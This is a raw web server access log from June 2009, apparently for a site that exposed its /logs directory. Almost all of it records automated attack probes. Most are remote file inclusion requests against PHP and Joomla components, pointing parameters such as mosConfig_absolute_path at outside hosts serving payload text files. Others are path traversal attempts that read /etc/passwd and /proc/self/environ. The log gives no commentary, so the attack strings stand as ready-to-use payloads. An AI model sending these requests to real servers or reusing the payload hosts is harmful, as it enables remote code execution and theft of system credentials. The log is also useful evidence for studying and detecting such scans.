87.106.67.146 - - [08/Jun/2009:03:46:25 -0400] "GET /logs/access_log.Q109051800/twindow_notice.php?shop_this_skin_path=http://napfia.hu/_userfiles/flash/id1.txt?? HTTP/1.1" 404 243 "-" "Mozilla/5.0"
87.106.67.146 - - [08/Jun/2009:03:46:25 -0400] "GET /twindow_notice.php?shop_this_skin_path=http://napfia.hu/_userfiles/flash/id1.txt?? HTTP/1.1" 404 216 "-" "Mozilla/5.0"
87.106.67.146 - - [08/Jun/2009:03:46:26 -0400] "GET /logs/twindow_notice.php?shop_this_skin_path=http://napfia.hu/_userfiles/flash/id1.txt?? HTTP/1.1" 404 221 "-" "Mozilla/5.0"
195.22.11.158 - - [08/Jun/2009:03:46:38 -0400] "GET /logs/access_log.Q109050700//index.php?autoLoadConfig[999][0][autoType]=include&autoLoadConfig[999][0][loadFile]=http://kamtiez.comind.it/idxx.txt?? HTTP/1.1" 404 235 "-" "Mozilla/5.0"
195.22.11.158 - - [08/Jun/2009:03:46:38 -0400] "GET /logs/access_log.Q109051700//index.php?autoLoadConfig[999][0][autoType]=include&autoLoadConfig[999][0][loadFile]=http://kamtiez.comind.it/idxx.txt?? HTTP/1.1" 404 235 "-" "Mozilla/5.0"
209.59.12.99 - - [08/Jun/2009:03:46:50 -0400] "GET / HTTP/1.0" 200 409 "-" "check_http/1.81 (nagios-plugins 1.4)"
146.164.96.130 - - [08/Jun/2009:03:49:21 -0400] "GET /logs/errors.php?error=http://200.25.204.162/.sys/v6id.txt??? HTTP/1.1" 404 213 "-" "libwww-perl/5.812"
146.164.96.130 - - [08/Jun/2009:03:49:21 -0400] "GET /logs/access_log.Q109052400/errors.php?error=http://200.25.204.162/.sys/v6id.txt??? HTTP/1.1" 404 235 "-" "libwww-perl/5.812"
146.164.96.130 - - [08/Jun/2009:03:49:21 -0400] "GET /errors.php?error=http://200.25.204.162/.sys/v6id.txt??? HTTP/1.1" 404 208 "-" "libwww-perl/5.812"
209.216.213.145 - - [08/Jun/2009:03:49:34 -0400] "GET //?sIncPath=http://www.kq-china.com/web//plugins/system/id1.txt??? HTTP/1.1" 200 452 "-" "Mozilla/5.0"
209.216.213.145 - - [08/Jun/2009:03:49:34 -0400] "GET /logs/access_log.Q109053100%20%20//?sIncPath=http://www.kq-china.com/web//plugins/system/id1.txt??? HTTP/1.1" 404 228 "-" "Mozilla/5.0"
209.216.213.145 - - [08/Jun/2009:03:49:35 -0400] "GET /logs//?sIncPath=http://www.kq-china.com/web//plugins/system/id1.txt??? HTTP/1.1" 200 4639 "-" "Mozilla/5.0"
146.164.96.130 - - [08/Jun/2009:03:49:46 -0400] "GET /logs/error_log.Q109042900/errors.php?error=http://200.25.204.162/.sys/v6id.txt??? HTTP/1.1" 404 234 "-" "libwww-perl/5.812"
66.175.122.228 - - [08/Jun/2009:03:50:29 -0400] "GET /logs/access_log.Q109051700%20%20/components/com_pollxt/conf.pollxt.php?mosConfig_absolute_path=http://www.promodelia.com/uiu.txt?? HTTP/1.1" 404 264 "-" "Mozilla/5.0"
66.175.122.228 - - [08/Jun/2009:03:50:29 -0400] "GET /logs/access_log.Q109053100%20%20/components/com_pollxt/conf.pollxt.php?mosConfig_absolute_path=http://www.promodelia.com/uiu.txt?? HTTP/1.1" 404 264 "-" "Mozilla/5.0"
64.72.150.123 - - [08/Jun/2009:03:50:44 -0400] "GET /logs/access_log.Q109052200//modules/4nAlbum/public/displayCategory.php?basepath=http://www.furniturebkk.com//components/com_virtuemart/shop_image/id.txt? HTTP/1.1" 404 268 "-" "Mozilla/5.0"
64.72.150.123 - - [08/Jun/2009:03:50:44 -0400] "GET /logs/access_log.Q109052500//modules/4nAlbum/public/displayCategory.php?basepath=http://www.furniturebkk.com//components/com_virtuemart/shop_image/id.txt? HTTP/1.1" 404 268 "-" "Mozilla/5.0"
70.85.165.10 - - [08/Jun/2009:03:51:05 -0400] "GET /logs/access_log.Q109052600//admin/business_inc/saveserver.php?thisdir=http://rsh.kiev.ua/images/idfx1.txt? HTTP/1.1" 404 259 "-" "Mozilla/5.0"
209.59.12.99 - - [08/Jun/2009:03:51:50 -0400] "GET / HTTP/1.0" 200 409 "-" "check_http/1.81 (nagios-plugins 1.4)"
64.6.231.215 - - [08/Jun/2009:03:52:10 -0400] "GET /home.php?pagina=http://personel.trakya.edu.tr/media_yedek/id1.txt?? HTTP/1.1" 404 206 "-" "Mozilla/5.0"
64.6.231.215 - - [08/Jun/2009:03:52:10 -0400] "GET /logs/access_log.Q109052200/home.php?pagina=http://personel.trakya.edu.tr/media_yedek/id1.txt?? HTTP/1.1" 404 233 "-" "Mozilla/5.0"
64.6.231.215 - - [08/Jun/2009:03:52:10 -0400] "GET /logs/home.php?pagina=http://personel.trakya.edu.tr/media_yedek/id1.txt?? HTTP/1.1" 404 211 "-" "Mozilla/5.0"
64.6.231.215 - - [08/Jun/2009:03:52:10 -0400] "GET /logs/access_log.Q109052200/home.php?pagina=http://personel.trakya.edu.tr/media_yedek/id1.txt?? HTTP/1.1" 404 233 "-" "Mozilla/5.0"
64.6.231.215 - - [08/Jun/2009:03:52:10 -0400] "GET /home.php?pagina=http://personel.trakya.edu.tr/media_yedek/id1.txt?? HTTP/1.1" 404 206 "-" "Mozilla/5.0"
64.6.231.215 - - [08/Jun/2009:03:52:10 -0400] "GET /logs/home.php?pagina=http://personel.trakya.edu.tr/media_yedek/id1.txt?? HTTP/1.1" 404 211 "-" "Mozilla/5.0"
64.6.231.215 - - [08/Jun/2009:03:52:15 -0400] "GET /logs/access_log.Q109053100/home.php?pagina=http://personel.trakya.edu.tr/media_yedek/id1.txt?? HTTP/1.1" 404 233 "-" "Mozilla/5.0"
64.6.231.215 - - [08/Jun/2009:03:52:15 -0400] "GET /logs/home.php?pagina=http://personel.trakya.edu.tr/media_yedek/id1.txt?? HTTP/1.1" 404 211 "-" "Mozilla/5.0"
64.6.231.215 - - [08/Jun/2009:03:52:15 -0400] "GET /home.php?pagina=http://personel.trakya.edu.tr/media_yedek/id1.txt?? HTTP/1.1" 404 206 "-" "Mozilla/5.0"
64.6.231.215 - - [08/Jun/2009:03:52:15 -0400] "GET /logs/access_log.Q109052200%20%20/home.php?pagina=http://personel.trakya.edu.tr/media_yedek/id1.txt?? HTTP/1.1" 404 235 "-" "Mozilla/5.0"
64.6.231.215 - - [08/Jun/2009:03:52:15 -0400] "GET /home.php?pagina=http://personel.trakya.edu.tr/media_yedek/id1.txt?? HTTP/1.1" 404 206 "-" "Mozilla/5.0"
64.6.231.215 - - [08/Jun/2009:03:52:15 -0400] "GET /logs/home.php?pagina=http://personel.trakya.edu.tr/media_yedek/id1.txt?? HTTP/1.1" 404 211 "-" "Mozilla/5.0"
64.6.231.215 - - [08/Jun/2009:03:52:15 -0400] "GET /logs/access_log.Q109052200%20%20/home.php?pagina=http://personel.trakya.edu.tr/media_yedek/id1.txt?? HTTP/1.1" 404 235 "-" "Mozilla/5.0"
64.6.231.215 - - [08/Jun/2009:03:52:16 -0400] "GET /home.php?pagina=http://personel.trakya.edu.tr/media_yedek/id1.txt?? HTTP/1.1" 404 206 "-" "Mozilla/5.0"
64.6.231.215 - - [08/Jun/2009:03:52:16 -0400] "GET /logs/home.php?pagina=http://personel.trakya.edu.tr/media_yedek/id1.txt?? HTTP/1.1" 404 211 "-" "Mozilla/5.0"
64.6.231.215 - - [08/Jun/2009:03:52:16 -0400] "GET /logs/access_log.Q109052200/home.php?pagina=http://personel.trakya.edu.tr/media_yedek/id1.txt?? HTTP/1.1" 404 233 "-" "Mozilla/5.0"
64.6.231.215 - - [08/Jun/2009:03:52:17 -0400] "GET /logs/access_log.Q109053100/home.php?pagina=http://personel.trakya.edu.tr/media_yedek/id1.txt?? HTTP/1.1" 404 233 "-" "Mozilla/5.0"
64.6.231.215 - - [08/Jun/2009:03:52:19 -0400] "GET /home.php?pagina=http://personel.trakya.edu.tr/media_yedek/id1.txt?? HTTP/1.1" 404 206 "-" "Mozilla/5.0"
64.6.231.215 - - [08/Jun/2009:03:52:19 -0400] "GET /logs/home.php?pagina=http://personel.trakya.edu.tr/media_yedek/id1.txt?? HTTP/1.1" 404 211 "-" "Mozilla/5.0"
64.6.231.215 - - [08/Jun/2009:03:52:19 -0400] "GET /logs/access_log.Q109052200/home.php?pagina=http://personel.trakya.edu.tr/media_yedek/id1.txt?? HTTP/1.1" 404 233 "-" "Mozilla/5.0"
64.6.231.215 - - [08/Jun/2009:03:52:19 -0400] "GET /logs/access_log.Q109053100%20%20/home.php?pagina=http://personel.trakya.edu.tr/media_yedek/id1.txt?? HTTP/1.1" 404 235 "-" "Mozilla/5.0"
64.6.231.215 - - [08/Jun/2009:03:52:21 -0400] "GET /logs/access_log.Q109053100/home.php?pagina=http://personel.trakya.edu.tr/media_yedek/id1.txt?? HTTP/1.1" 404 233 "-" "Mozilla/5.0"
64.6.231.215 - - [08/Jun/2009:03:52:23 -0400] "GET /logs/access_log.Q109053100%20%20/home.php?pagina=http://personel.trakya.edu.tr/media_yedek/id1.txt?? HTTP/1.1" 404 235 "-" "Mozilla/5.0"
64.6.231.215 - - [08/Jun/2009:03:52:30 -0400] "GET /logs/access_log.Q109053100/home.php?pagina=http://personel.trakya.edu.tr/media_yedek/id1.txt?? HTTP/1.1" 404 233 "-" "Mozilla/5.0"
64.34.181.87 - - [08/Jun/2009:03:52:31 -0400] "GET //modules/TotalCalendar/about.php?inc_dir=http://www.top40argentina.com.ar/php/id1.txt? HTTP/1.1" 404 230 "-" "Mozilla/5.0"
64.34.181.87 - - [08/Jun/2009:03:52:31 -0400] "GET /logs//modules/TotalCalendar/about.php?inc_dir=http://www.top40argentina.com.ar/php/id1.txt? HTTP/1.1" 404 235 "-" "Mozilla/5.0"
64.34.181.87 - - [08/Jun/2009:03:52:31 -0400] "GET /logs/access_log.Q109052200//modules/TotalCalendar/about.php?inc_dir=http://www.top40argentina.com.ar/php/id1.txt? HTTP/1.1" 404 257 "-" "Mozilla/5.0"
201.232.54.48 - - [08/Jun/2009:03:52:43 -0400] "GET //components/errors.php?error=http://www.kiralyfa.hu/copyright?? HTTP/1.1" 404 220 "-" "Mozilla/5.0"
201.232.54.48 - - [08/Jun/2009:03:52:43 -0400] "GET /logs//components/errors.php?error=http://www.kiralyfa.hu/copyright?? HTTP/1.1" 404 225 "-" "Mozilla/5.0"
201.232.54.48 - - [08/Jun/2009:03:52:43 -0400] "GET /logs/access_log.Q109052400//components/errors.php?error=http://www.kiralyfa.hu/copyright?? HTTP/1.1" 404 247 "-" "Mozilla/5.0"
70.85.165.10 - - [08/Jun/2009:03:52:46 -0400] "GET /logs/access_log.Q109052600//admin/business_inc/saveserver.php?thisdir=http://rsh.kiev.ua/images/idfx1.txt? HTTP/1.1" 404 259 "-" "Mozilla/5.0"
201.232.54.48 - - [08/Jun/2009:03:53:02 -0400] "GET //components/errors.php?error=http://www.kiralyfa.hu/copyright?? HTTP/1.1" 404 220 "-" "Mozilla/5.0"
201.232.54.48 - - [08/Jun/2009:03:53:02 -0400] "GET /logs//components/errors.php?error=http://www.kiralyfa.hu/copyright?? HTTP/1.1" 404 225 "-" "Mozilla/5.0"
201.232.54.48 - - [08/Jun/2009:03:53:02 -0400] "GET /logs/access_log.Q109052400//components/errors.php?error=http://www.kiralyfa.hu/copyright?? HTTP/1.1" 404 247 "-" "Mozilla/5.0"
217.169.210.130 - - [08/Jun/2009:03:53:22 -0400] "GET /logs/access_log.Q109052400//?mosConfig_absolute_path=http://www.gsmch.org/club/chi.txt?? HTTP/1.1" 404 226 "-" "libwww-perl/5.76"
217.169.210.130 - - [08/Jun/2009:03:53:23 -0400] "GET //?mosConfig_absolute_path=http://www.gsmch.org/club/chi.txt?? HTTP/1.1" 200 452 "-" "libwww-perl/5.76"
217.169.210.130 - - [08/Jun/2009:03:53:23 -0400] "GET /logs//?mosConfig_absolute_path=http://www.gsmch.org/club/chi.txt?? HTTP/1.1" 200 4639 "-" "libwww-perl/5.76"
217.169.210.130 - - [08/Jun/2009:03:53:43 -0400] "GET /logs/access_log.Q109050900//?mosConfig_absolute_path=http://www.gsmch.org/club/chi.txt?? HTTP/1.1" 404 226 "-" "libwww-perl/5.76"
217.169.210.130 - - [08/Jun/2009:03:53:43 -0400] "GET //?mosConfig_absolute_path=http://www.gsmch.org/club/chi.txt?? HTTP/1.1" 200 452 "-" "libwww-perl/5.76"
217.169.210.130 - - [08/Jun/2009:03:53:44 -0400] "GET /logs//?mosConfig_absolute_path=http://www.gsmch.org/club/chi.txt?? HTTP/1.1" 200 4639 "-" "libwww-perl/5.76"
64.6.231.215 - - [08/Jun/2009:03:54:03 -0400] "GET /logs/access_log.Q109052200/home.php?pagina=http://personel.trakya.edu.tr/media_yedek/id1.txt?? HTTP/1.1" 404 233 "-" "Mozilla/5.0"
64.6.231.215 - - [08/Jun/2009:03:54:03 -0400] "GET /logs/home.php?pagina=http://personel.trakya.edu.tr/media_yedek/id1.txt?? HTTP/1.1" 404 211 "-" "Mozilla/5.0"
64.6.231.215 - - [08/Jun/2009:03:54:03 -0400] "GET /home.php?pagina=http://personel.trakya.edu.tr/media_yedek/id1.txt?? HTTP/1.1" 404 206 "-" "Mozilla/5.0"
64.6.231.215 - - [08/Jun/2009:03:54:03 -0400] "GET /logs/access_log.Q109052200/home.php?pagina=http://personel.trakya.edu.tr/media_yedek/id1.txt?? HTTP/1.1" 404 233 "-" "Mozilla/5.0"
64.6.231.215 - - [08/Jun/2009:03:54:03 -0400] "GET /home.php?pagina=http://personel.trakya.edu.tr/media_yedek/id1.txt?? HTTP/1.1" 404 206 "-" "Mozilla/5.0"
64.6.231.215 - - [08/Jun/2009:03:54:03 -0400] "GET /logs/home.php?pagina=http://personel.trakya.edu.tr/media_yedek/id1.txt?? HTTP/1.1" 404 211 "-" "Mozilla/5.0"
64.6.231.215 - - [08/Jun/2009:03:54:10 -0400] "GET /logs/access_log.Q109053100/home.php?pagina=http://personel.trakya.edu.tr/media_yedek/id1.txt?? HTTP/1.1" 404 233 "-" "Mozilla/5.0"
64.6.231.215 - - [08/Jun/2009:03:54:11 -0400] "GET /logs/access_log.Q109053100/home.php?pagina=http://personel.trakya.edu.tr/media_yedek/id1.txt?? HTTP/1.1" 404 233 "-" "Mozilla/5.0"
217.169.210.130 - - [08/Jun/2009:03:54:13 -0400] "GET /logs/access_log.Q109052100//?mosConfig_absolute_path=http://www.gsmch.org/club/chi.txt?? HTTP/1.1" 404 226 "-" "libwww-perl/5.76"
217.169.210.130 - - [08/Jun/2009:03:54:14 -0400] "GET //?mosConfig_absolute_path=http://www.gsmch.org/club/chi.txt?? HTTP/1.1" 200 452 "-" "libwww-perl/5.76"
217.169.210.130 - - [08/Jun/2009:03:54:17 -0400] "GET /logs//?mosConfig_absolute_path=http://www.gsmch.org/club/chi.txt?? HTTP/1.1" 200 4639 "-" "libwww-perl/5.76"
121.165.73.157 - - [08/Jun/2009:03:56:41 -0400] "GET //modules/coppermine/include/init.inc.php?CPG_M_DIR=http://cafe0.fileave.com/id.feelcomz.txt%20%20? HTTP/1.1" 404 238 "-" "Mozilla/5.0"
121.165.73.157 - - [08/Jun/2009:03:56:41 -0400] "GET /logs/access_log.Q109052200//modules/coppermine/include/init.inc.php?CPG_M_DIR=http://cafe0.fileave.com/id.feelcomz.txt%20%20? HTTP/1.1" 404 265 "-" "Mozilla/5.0"
121.165.73.157 - - [08/Jun/2009:03:56:41 -0400] "GET /logs//modules/coppermine/include/init.inc.php?CPG_M_DIR=http://cafe0.fileave.com/id.feelcomz.txt%20%20? HTTP/1.1" 404 243 "-" "Mozilla/5.0"
121.165.73.157 - - [08/Jun/2009:03:56:44 -0400] "GET /logs/access_log.Q109052500//modules/coppermine/include/init.inc.php?CPG_M_DIR=http://cafe0.fileave.com/id.feelcomz.txt%20%20? HTTP/1.1" 404 265 "-" "Mozilla/5.0"
209.59.12.99 - - [08/Jun/2009:03:56:51 -0400] "GET / HTTP/1.0" 200 409 "-" "check_http/1.81 (nagios-plugins 1.4)"
77.221.152.82 - - [08/Jun/2009:03:57:22 -0400] "GET /logs/access_log.Q109051700//administrator/components/com_pollxt/conf.pollxt.php?mosConfig_absolute_path=http://ldm.ru/docs/V7ID.txt?? HTTP/1.1" 404 277 "-" "libwww-perl/5.805"
77.221.152.82 - - [08/Jun/2009:03:57:22 -0400] "GET //administrator/components/com_pollxt/conf.pollxt.php?mosConfig_absolute_path=http://ldm.ru/docs/V7ID.txt?? HTTP/1.1" 404 250 "-" "libwww-perl/5.805"
77.221.152.82 - - [08/Jun/2009:03:57:22 -0400] "GET /logs//administrator/components/com_pollxt/conf.pollxt.php?mosConfig_absolute_path=http://ldm.ru/docs/V7ID.txt?? HTTP/1.1" 404 255 "-" "libwww-perl/5.805"
77.221.152.82 - - [08/Jun/2009:03:57:22 -0400] "GET /logs/access_log.Q109053100//administrator/components/com_pollxt/conf.pollxt.php?mosConfig_absolute_path=http://ldm.ru/docs/V7ID.txt?? HTTP/1.1" 404 277 "-" "libwww-perl/5.805"
201.232.54.48 - - [08/Jun/2009:03:57:23 -0400] "GET /logs/access_log.Q109052400%20%20//components/errors.php?error=http://www.kiralyfa.hu/copyright?? HTTP/1.1" 404 249 "-" "Mozilla/5.0"
201.232.54.48 - - [08/Jun/2009:03:58:12 -0400] "GET /logs/access_log.Q109052500%20%20//components/errors.php?error=http://www.kiralyfa.hu/copyright?? HTTP/1.1" 404 249 "-" "Mozilla/5.0"
62.128.135.52 - - [08/Jun/2009:03:58:23 -0400] "GET //mambots/content/josowbot.content.php?mosConfig_absolute_path=http://osttele.com/images/blink?? HTTP/1.1" 404 235 "-" "libwww-perl/5.805"
64.34.181.87 - - [08/Jun/2009:03:58:46 -0400] "GET /logs/access_log.Q109052200%20%20//modules/TotalCalendar/about.php?inc_dir=http://www.top40argentina.com.ar/php/id1.txt? HTTP/1.1" 404 259 "-" "Mozilla/5.0"
217.169.210.130 - - [08/Jun/2009:03:58:47 -0400] "GET /logs/access_log.Q109052600//?mosConfig_absolute_path=http://www.gsmch.org/club/chi.txt?? HTTP/1.1" 404 226 "-" "libwww-perl/5.76"
62.128.135.52 - - [08/Jun/2009:03:58:56 -0400] "GET /logs/error_log.Q109011700//mambots/content/josowbot.content.php?mosConfig_absolute_path=http://osttele.com/images/blink?? HTTP/1.1" 404 261 "-" "libwww-perl/5.805"
62.128.135.52 - - [08/Jun/2009:03:58:57 -0400] "GET //mambots/content/josowbot.content.php?mosConfig_absolute_path=http://osttele.com/images/blink?? HTTP/1.1" 404 235 "-" "libwww-perl/5.805"
62.128.135.52 - - [08/Jun/2009:03:58:57 -0400] "GET /logs//mambots/content/josowbot.content.php?mosConfig_absolute_path=http://osttele.com/images/blink?? HTTP/1.1" 404 240 "-" "libwww-perl/5.805"
77.221.152.82 - - [08/Jun/2009:03:59:05 -0400] "GET /logs//ktmllite/includes/ktedit/toolbar.php?dirDepth=http://ldm.ru/docs/V7ID.txt?? HTTP/1.1" 404 240 "-" "libwww-perl/5.805"
77.221.152.82 - - [08/Jun/2009:03:59:05 -0400] "GET /logs/access_log.Q109052900//ktmllite/includes/ktedit/toolbar.php?dirDepth=http://ldm.ru/docs/V7ID.txt?? HTTP/1.1" 404 262 "-" "libwww-perl/5.805"
77.221.152.82 - - [08/Jun/2009:03:59:05 -0400] "GET //ktmllite/includes/ktedit/toolbar.php?dirDepth=http://ldm.ru/docs/V7ID.txt?? HTTP/1.1" 404 235 "-" "libwww-perl/5.805"
202.29.32.146 - - [08/Jun/2009:03:59:10 -0400] "GET /logs/access_log.Q109052900//administrator/components/com_chronocontact/excelwriter/Writer.php?mosConfig_absolute_path=http://www.univers-du-pin.be/buggsbunny?? HTTP/1.1" 404 291 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; SV1; .NET CLR 1.1.4322)"
202.29.32.146 - - [08/Jun/2009:03:59:10 -0400] "GET //administrator/components/com_chronocontact/excelwriter/Writer.php?mosConfig_absolute_path=http://www.univers-du-pin.be/buggsbunny?? HTTP/1.1" 404 264 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; SV1; .NET CLR 1.1.4322)"
202.29.32.146 - - [08/Jun/2009:03:59:10 -0400] "GET /logs//administrator/components/com_chronocontact/excelwriter/Writer.php?mosConfig_absolute_path=http://www.univers-du-pin.be/buggsbunny?? HTTP/1.1" 404 269 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; SV1; .NET CLR 1.1.4322)"
202.29.32.146 - - [08/Jun/2009:03:59:11 -0400] "GET /logs/access_log.Q109052900/errors.php?error=http://www.univers-du-pin.be/buggsbunny?? HTTP/1.1" 404 235 "-" "MOT-MPx220/1.400 Mozilla/4.0 (compatible; MSIE 4.01; Windows CE; Smartphone;"
202.29.32.146 - - [08/Jun/2009:03:59:11 -0400] "GET /logs/errors.php?error=http://www.univers-du-pin.be/buggsbunny?? HTTP/1.1" 404 213 "-" "MOT-MPx220/1.400 Mozilla/4.0 (compatible; MSIE 4.01; Windows CE; Smartphone;"
202.29.32.146 - - [08/Jun/2009:03:59:11 -0400] "GET /errors.php?error=http://www.univers-du-pin.be/buggsbunny?? HTTP/1.1" 404 208 "-" "MOT-MPx220/1.400 Mozilla/4.0 (compatible; MSIE 4.01; Windows CE; Smartphone;"
202.29.32.146 - - [08/Jun/2009:03:59:12 -0400] "GET /logs/access_log.Q109052900//administrator/components/com_chronocontact/excelwriter/Writer.php?mosConfig_absolute_path=../../../../../../../../../../../../../../../../../../../../../../../../proc/self/environ HTTP/1.1" 404 291 "-" "XXXXXX"
202.29.32.146 - - [08/Jun/2009:03:59:12 -0400] "GET /logs//administrator/components/com_chronocontact/excelwriter/Writer.php?mosConfig_absolute_path=../../../../../../../../../../../../../../../../../../../../../../../../proc/self/environ HTTP/1.1" 404 269 "-" "XXXXXX"
202.29.32.146 - - [08/Jun/2009:03:59:12 -0400] "GET //administrator/components/com_chronocontact/excelwriter/Writer.php?mosConfig_absolute_path=../../../../../../../../../../../../../../../../../../../../../../../../proc/self/environ HTTP/1.1" 404 264 "-" "XXXXXX"
202.29.32.146 - - [08/Jun/2009:03:59:12 -0400] "GET /logs/access_log.Q109052900//administrator/components/com_chronocontact/excelwriter/Writer.php?mosConfig_absolute_path=../../../../../../../../../../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 291 "-" "XXXXXX"
202.29.32.146 - - [08/Jun/2009:03:59:12 -0400] "GET //administrator/components/com_chronocontact/excelwriter/Writer.php?mosConfig_absolute_path=../../../../../../../../../../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 264 "-" "XXXXXX"
202.29.32.146 - - [08/Jun/2009:03:59:12 -0400] "GET /logs//administrator/components/com_chronocontact/excelwriter/Writer.php?mosConfig_absolute_path=../../../../../../../../../../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 269 "-" "XXXXXX"
65.98.59.178 - - [08/Jun/2009:03:59:20 -0400] "GET /logs/access_log.Q109052900//administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://www.angelcitytrading.com//css/id.txt?? HTTP/1.1" 404 276 "-" "libwww-perl/5.811"
65.98.59.178 - - [08/Jun/2009:03:59:27 -0400] "GET /logs/access_log.Q109052900//administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://www.angelcitytrading.com//css/id.txt?? HTTP/1.1" 404 276 "-" "libwww-perl/5.811"
77.221.152.82 - - [08/Jun/2009:03:59:51 -0400] "GET /logs/access_log.Q109050900//ktmllite/includes/ktedit/toolbar.php?dirDepth=http://ldm.ru/docs/V7ID.txt?? HTTP/1.1" 404 262 "-" "libwww-perl/5.805"
124.0.73.2 - - [08/Jun/2009:04:01:02 -0400] "GET /logs/access_log.Q109050700//index.php?autoLoadConfig[999][0][autoType]=include&autoLoadConfig[999][0][loadFile]=http://kamtiez.comind.it/idxx.txt?? HTTP/1.1" 404 235 "-" "Mozilla/5.0"
87.106.67.146 - - [08/Jun/2009:04:01:39 -0400] "GET /logs//s_loadenv.inc.php?DOCUMENT_ROOT=http://napfia.hu/_userfiles/flash/id1.txt?? HTTP/1.1" 404 221 "-" "Mozilla/5.0"
87.106.67.146 - - [08/Jun/2009:04:01:39 -0400] "GET //s_loadenv.inc.php?DOCUMENT_ROOT=http://napfia.hu/_userfiles/flash/id1.txt?? HTTP/1.1" 404 216 "-" "Mozilla/5.0"
87.106.67.146 - - [08/Jun/2009:04:01:51 -0400] "GET //s_loadenv.inc.php?DOCUMENT_ROOT=http://napfia.hu/_userfiles/flash/id1.txt?? HTTP/1.1" 404 216 "-" "Mozilla/5.0"
87.106.67.146 - - [08/Jun/2009:04:01:51 -0400] "GET /logs//s_loadenv.inc.php?DOCUMENT_ROOT=http://napfia.hu/_userfiles/flash/id1.txt?? HTTP/1.1" 404 221 "-" "Mozilla/5.0"
209.59.12.99 - - [08/Jun/2009:04:01:52 -0400] "GET / HTTP/1.0" 200 409 "-" "check_http/1.81 (nagios-plugins 1.4)"
64.34.181.87 - - [08/Jun/2009:04:02:05 -0400] "GET /logs/access_log.Q109052400%20%20//modules/TotalCalendar/about.php?inc_dir=http://www.top40argentina.com.ar/php/id1.txt? HTTP/1.1" 404 259 "-" "Mozilla/5.0"
64.34.181.87 - - [08/Jun/2009:04:02:26 -0400] "GET /logs/popup.php?path=http://www.top40argentina.com.ar/php/id1.txt? HTTP/1.1" 404 212 "-" "Mozilla/5.0"
64.34.181.87 - - [08/Jun/2009:04:02:26 -0400] "GET /logs/access_log.Q109053000%20%20/popup.php?path=http://www.top40argentina.com.ar/php/id1.txt? HTTP/1.1" 404 236 "-" "Mozilla/5.0"
64.34.181.87 - - [08/Jun/2009:04:02:26 -0400] "GET /popup.php?path=http://www.top40argentina.com.ar/php/id1.txt? HTTP/1.1" 404 207 "-" "Mozilla/5.0"
87.106.67.146 - - [08/Jun/2009:04:02:28 -0400] "GET //s_loadenv.inc.php?DOCUMENT_ROOT=http://napfia.hu/_userfiles/flash/id1.txt?? HTTP/1.1" 404 216 "-" "Mozilla/5.0"
87.106.67.146 - - [08/Jun/2009:04:02:28 -0400] "GET /logs//s_loadenv.inc.php?DOCUMENT_ROOT=http://napfia.hu/_userfiles/flash/id1.txt?? HTTP/1.1" 404 221 "-" "Mozilla/5.0"
87.106.67.146 - - [08/Jun/2009:04:02:47 -0400] "GET //s_loadenv.inc.php?DOCUMENT_ROOT=http://napfia.hu/_userfiles/flash/id1.txt?? HTTP/1.1" 404 216 "-" "Mozilla/5.0"
87.106.67.146 - - [08/Jun/2009:04:02:47 -0400] "GET /logs//s_loadenv.inc.php?DOCUMENT_ROOT=http://napfia.hu/_userfiles/flash/id1.txt?? HTTP/1.1" 404 221 "-" "Mozilla/5.0"
87.106.67.146 - - [08/Jun/2009:04:02:52 -0400] "GET //s_loadenv.inc.php?DOCUMENT_ROOT=http://napfia.hu/_userfiles/flash/id1.txt?? HTTP/1.1" 404 216 "-" "Mozilla/5.0"
87.106.67.146 - - [08/Jun/2009:04:02:52 -0400] "GET /logs//s_loadenv.inc.php?DOCUMENT_ROOT=http://napfia.hu/_userfiles/flash/id1.txt?? HTTP/1.1" 404 221 "-" "Mozilla/5.0"
87.106.67.146 - - [08/Jun/2009:04:02:53 -0400] "GET //s_loadenv.inc.php?DOCUMENT_ROOT=http://napfia.hu/_userfiles/flash/id1.txt?? HTTP/1.1" 404 216 "-" "Mozilla/5.0"
87.106.67.146 - - [08/Jun/2009:04:02:53 -0400] "GET /logs//s_loadenv.inc.php?DOCUMENT_ROOT=http://napfia.hu/_userfiles/flash/id1.txt?? HTTP/1.1" 404 221 "-" "Mozilla/5.0"
66.249.71.14 - - [08/Jun/2009:04:03:58 -0400] "GET /cgi-bin/lansaweb?procfun+wordpr01+webfunc+%20M37+funcparms+WEBKEY(A0100):DDCSRCH+RNDIV(S004):01+RNCLAS(S0040):10+RNSUBS%20(S0040):03 HTTP/1.1" 200 61561 "-" "Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"
121.165.73.157 - - [08/Jun/2009:04:04:05 -0400] "GET /logs/access_log.Q109052200%20%20//modules/coppermine/include/init.inc.php?CPG_M_DIR=http://cafe0.fileave.com/id.feelcomz.txt%20%20? HTTP/1.1" 404 267 "-" "Mozilla/5.0"
201.232.54.48 - - [08/Jun/2009:04:04:07 -0400] "GET /logs/access_log.Q109052400%20%20//components/errors.php?error=http://www.kiralyfa.hu/copyright?? HTTP/1.1" 404 249 "-" "Mozilla/5.0"
91.149.157.130 - - [08/Jun/2009:04:04:08 -0400] "GET //newspublish/include.php?path%5Bdocroot%5D=http://bruntil.com/img/fx29id1.txt?? HTTP/1.1" 404 222 "-" "Mozilla/5.0"
91.149.157.130 - - [08/Jun/2009:04:04:08 -0400] "GET /logs//newspublish/include.php?path%5Bdocroot%5D=http://bruntil.com/img/fx29id1.txt?? HTTP/1.1" 404 227 "-" "Mozilla/5.0"
91.149.157.130 - - [08/Jun/2009:04:04:14 -0400] "GET /logs/access_log.Q109051800//newspublish/include.php?path%5Bdocroot%5D=http://bruntil.com/img/fx29id1.txt?? HTTP/1.1" 404 249 "-" "Mozilla/5.0"
77.221.130.2 - - [08/Jun/2009:04:04:21 -0400] "GET /logs/access_log.Q109052600/index.php?skin_board_path=../../../../../../../../../../../../../etc/passwd%00 HTTP/1.1" 404 234 "-" "libwww-perl/5.805"
77.221.130.2 - - [08/Jun/2009:04:04:21 -0400] "GET /logs/access_log.Q109052900/index.php?skin_board_path=../../../../../../../../../../../../../etc/passwd%00 HTTP/1.1" 404 234 "-" "libwww-perl/5.805"
